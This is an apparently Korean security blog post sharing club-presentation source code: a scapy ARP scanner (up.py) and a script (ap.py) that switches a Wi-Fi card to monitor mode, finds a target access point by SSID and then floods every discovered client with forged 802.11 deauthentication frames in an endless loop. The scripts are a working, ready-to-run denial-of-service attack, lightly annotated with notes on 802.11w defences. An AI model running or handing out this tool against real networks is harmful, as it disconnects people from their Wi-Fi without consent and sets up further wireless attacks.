
cdor1's lab

DeAuth packet attack 본문

Security/Network

DeAuth packet attack

Cdor1 2016. 12. 7. 05:53

동아리 발표 소스이다.

강력한 패킷 관련 라이브러리인 scapy 모듈을 사용했다.


[*] up.py - ARP 패킷을 활용해 online인 호스트와 offline인 호스트를 구분


#!/usr/bin/python
from scapy.all import *
import sys

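# ANSI SGR escape sequences used to colour the console output.
r = '\033[31m'  # red
b = '\033[34m'  # blue
g = '\033[32m'  # green
y = '\033[33m'  # yellow
m = '\033[35m'  # magenta (the original used 34, which is blue)
c = '\033[36m'  # cyan
w = '\033[0m'   # reset: restores the terminal's default attributes, not white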
 
# Scapy settings for this module: use wlan0 and verbosity level 0.
conf.verb = 0
conf.iface = "wlan0"

# Seconds start_scan() waits for an ARP reply to each probe.
Timeout = 1
# MAC addresses collected by start_scan(); module-level, so it grows across calls.
macTable = []

def get_mac(ip_address):
    """Return the source MAC of the first ARP reply for *ip_address*, or None.

    A broadcast ARP who-has is sent with a 2 second timeout and up to 10
    retries. ARP replies are unauthenticated, so the returned address is
    whatever the responder claimed.
    """
    replies, _unanswered = srp(
        Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=ip_address),
        timeout=2,
        retry=10,
    )
    first_pair = next(iter(replies), None)
    if first_pair is None:
        return None
    _sent, reply = first_pair
    return reply.sprintf(r"%Ether.src%")
 
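def start_scan(ip):
    """Send a broadcast ARP request to ``ip + "0"`` .. ``ip + "254"`` and list responders.

    Args:
        ip: Dotted prefix the last octet is appended to, e.g. ``"192.168.1."``.

    Returns:
        The module-level ``macTable`` list with the MAC address of every host
        that answered appended to it (repeated calls accumulate entries).
    """
    for last_octet in range(0, 255):
        target = ip + str(last_octet)
        answered, unanswered = srp(
            Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(pdst=target),
            timeout=Timeout,
        )

        if len(answered) > 0:
            # Take the MAC from the reply already received. The original asked
            # get_mac() twice more per host; a None from it raised TypeError in
            # the string concatenation and could put None into macTable.
            # ARP is unauthenticated, so this is the address the responder claimed.
            mac = answered[0][1].sprintf(r"%Ether.src%")
            print(y + "[*] IP: " + target + "\n[*] MAC: " + mac + w)
            macTable.append(mac)
        elif len(unanswered) > 0:
            # Two spaces keep the output of the former
            # `print a, " is down"` statement unchanged.
            print(r + unanswered[0].getlayer(ARP).pdst + "  is down" + w)
    print(y + "[*] Open: " + str(macTable) + w)
    return macTable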

[*] ap.py - DeAuth attack 수행


#!/usr/bin/env python
from scapy.all import *
from up import *
from time import *
import sys

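# ANSI SGR escape sequences used to colour the console output.
r = '\033[31m'  # red
b = '\033[34m'  # blue
g = '\033[32m'  # green
y = '\033[33m'  # yellow
m = '\033[35m'  # magenta (the original used 34, which is blue)
c = '\033[36m'  # cyan
w = '\033[0m'   # reset: restores the terminal's default attributes, not white

# Parallel lists filled by PacketHandler: ap_list[i] is the BSSID whose SSID is ap_name[i].
ap_list = []
ap_name = []
# Client MAC addresses; replaced by the result of start_scan() further down.
ban = []
# Loop flag for the beacon search: stays 1 until the requested SSID has been seen.
check = 1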

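def mode(mode, iface):
    """Take *iface* down, set its wireless mode to *mode*, and bring it back up.

    Args:
        mode: Mode name handed to ``iwconfig`` (the script passes "monitor").
        iface: Interface name; the script passes it straight from ``sys.argv``.

    Each command is run as an argument list without a shell. The original
    concatenated both values into ``os.system`` strings executed under sudo,
    so shell metacharacters in an argument would have run as root.
    Exit codes are ignored, as they were before.
    """
    import subprocess  # local import: the file's import block is left untouched

    commands = (
        ["sudo", "ifconfig", iface, "down"],
        ["sudo", "iwconfig", iface, "mode", mode],
        ["sudo", "ifconfig", iface, "up"],
    )
    for argv in commands:
        subprocess.call(argv)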

def PacketHandler(pkt):
    """Sniff callback: record and print each access point seen for the first time.

    Only 802.11 beacon frames (management type 0, subtype 8) are considered.
    The transmitter address goes into ``ap_list`` and the SSID into ``ap_name``
    at the same index.
    """
    if not pkt.haslayer(Dot11):
        return
    if pkt.type != 0 or pkt.subtype != 8:
        return

    bssid = pkt.addr2
    if bssid in ap_list:
        return

    ap_list.append(bssid)
    ap_name.append(pkt.info)
    # NOTE: pkt.info is the SSID exactly as received over the air and is
    # printed unescaped, so a beacon can place arbitrary bytes (including
    # terminal escape sequences) into this output.
    print(m + "[*] AP MAC: %s with SSID: %s " % (bssid, pkt.info) + w)

# Command line: <interface> <IPv4 prefix ending in "."> <SSID>.
# Any other argument count prints the usage text and exits with status 1.
if len(sys.argv) != 4:
	print "Usage: sudo python2 " + sys.argv[0] + " (Managed mode connected)interface ip ssid"
	print "Example: sudo python2 " + sys.argv[0] + " wlan0 192.168.1. cdor1"
	sys.exit(1)
# Make Scapy use the interface named on the command line.
conf.iface = sys.argv[1]
print(m + "[*] SCAN WIFI..." + w)
# start_scan arrives through `from up import *`; the MAC list it returns
# (hosts that answered ARP on the given prefix) is kept in `ban`.
ban = start_scan(sys.argv[2])

# The ARP scan above runs before this call; per the usage text the interface
# is expected to be in managed mode and connected until this point.
mode("monitor", sys.argv[1])
# Capture one frame per pass; PacketHandler records any new beacon. The loop
# ends once a recorded SSID equals the third argument, and that AP's address
# is kept in `bssid`.
while check:
	sniff(iface=sys.argv[1], prn = PacketHandler, count=1)
	for i in range(len(ap_name)):
		if ap_name[i] == sys.argv[3]:
			bssid = ap_list[i]
			check -= 1
# Dump every SSID and BSSID collected while searching.
print(y + str(ap_name) + w)
print(y + str(ap_list) + w)

# NOTE(review): get_if_addr() returns the interface's IPv4 address, while `ban`
# holds MAC strings, so the `myMac != ban[i]` test below looks like it is always
# true and the "MY MAC" branch is never reached - confirm.
myMac = get_if_addr(sys.argv[1])

print(c + "[*] START WIFI DEAUTH ATTACK: " + str(len(ban)) + " CLIENT!")
# Endless loop over the scanned clients. Each one is sent ten 802.11
# deauthentication frames (management type 0, subtype 12) 0.1 s apart, with the
# AP's BSSID as addr2/addr3, i.e. a forged sender. Reason code 7 is
# "class 3 frame received from nonassociated station".
# Defensive context: these frames are accepted because plain 802.11 management
# frames are not authenticated. With 802.11w Protected Management Frames
# negotiated (mandatory in WPA3), stations discard forged deauthentication
# frames. Repeated deauth bursts naming one BSSID and many stations are the
# pattern wireless intrusion detection looks for.
while 1:
	for i in range(len(ban)):
		if myMac != ban[i]:
			for count in range(10):
				packet = RadioTap()/Dot11(type=0,subtype=12,addr1=ban[i],addr2=bssid,addr3=bssid)/Dot11Deauth(reason=7)	
				sendp(packet, iface=sys.argv[1])
				sleep(0.1)
			print(g + "[*] ATTACK CILENT: " + ban[i] + w)
		else:
			print(g + "[*] MY MAC!!!" + w)

